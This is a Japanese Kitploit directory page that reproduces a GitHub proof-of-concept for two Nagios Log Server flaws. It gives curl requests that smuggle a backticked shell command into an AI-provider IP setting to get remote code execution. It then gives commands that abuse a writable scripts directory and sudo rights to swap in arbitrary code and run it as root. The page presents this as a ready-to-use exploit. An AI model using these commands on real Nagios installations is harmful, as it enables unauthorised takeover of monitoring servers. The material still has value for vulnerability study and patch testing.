Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-34322_CVE-2025-34323_Nagios_Log_Server — Nagios Log Server における CVE-2025-34322 および CVE-2025-34323 の概念実証エクスプロイト | Kitploit
ツール/GitHubGitHub/mcorybillington/cve-2025-34322_cve-2025-34323_nagios_log_server
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubmcorybillington/cve-2025-34322_cve-2025-34323_nagios_log_server

CVE-2025-34322_CVE-2025-34323_Nagios_Log_Server

Nagios Log Server における CVE-2025-34322 および CVE-2025-34323 の概念実証エクスプロイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
29ヶ月前未レビュー

CVE-2025-34322 および CVE-2025-34323 Nagios Log Server

CVE-2025-34322 および CVE-2025-34323 の Nagios Log Server における Proof of Concept エクスプロイト、および root としてシェルを返すための統合スクリプト。

CVE-2025-34322

認証後、これら2つの curl コマンドにセッションIDを置き換えてください。最初のコマンドで実行するコマンドを設定し、次のコマンドで実行します。

root@kitploit:~
$ curl -s -H 'Cookie: csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d; ls_session=<your-session-id>' --data 'csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d&natural_language_query=1&nlp_disclaimer=on&ai_provider=self_hosted&self_host_ip_address=`touch /tmp/rce`&ai_port=8000&saveglobals=1' http://192.168.122.198/nagioslogserver/admin/globals
$ curl -s -H 'Cookie: ls_session=<your-session-id>' http://192.168.122.198/nagioslogserver/dashboard/natural_language_to_query

CVE-2025-34323

www-data ユーザーは、以下のスクリプトを root として実行する sudo 権限を持っています。

root@kitploit:~
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/get_logstash_ports.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/profile.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh

また、/usr/local/nagioslogserver/scripts ディレクトリは書き込み可能です

root@kitploit:~
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver$ ls -lah
total 44K
drwxrwxr-x 11 nagios nagios   4.0K Sep  7 16:34 .
drwxr-xr-x 12 root   root     4.0K Sep  7 16:29 ..
drwxrwxr-x  4 nagios nagios   4.0K Sep  7 16:20 etc
-rw-r--r--  1 root   root        0 Sep  7 16:34 .installed
drwxr-xr-x 14 nagios nagios   4.0K Sep  7 16:29 logstash
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:20 mibs
drwxr-xr-x 12 nagios nagios   4.0K Sep  7 16:20 opensearch
drwxrwxr-x  5 nagios nagios   4.0K Sep  7 16:20 pythonvenv
drwxrwxr-x  3 nagios nagios   4.0K Sep  7 16:20 scripts
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:36 snapshots
drwxrwxr-x  3 nagios www-data 4.0K Sep  7 16:36 tmp
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:31 var

これは www-data ユーザーが nagios グループのメンバーであるためです。したがって、www-data ユーザーは所有権に関係なくディレクトリ内の任意のファイルを 移動 できます。次のコマンドは、www-data ユーザーが sudo 権限で実行できるファイル (reconfigure_ncpa.sh) を移動し、そのファイルを任意のコマンドを含む新しいファイルに置き換えます。

root@kitploit:~
mv /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh.bak;
echo '<command>' > /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
chmod +x /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
sleep 1;
sudo /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
ツールをダウンロード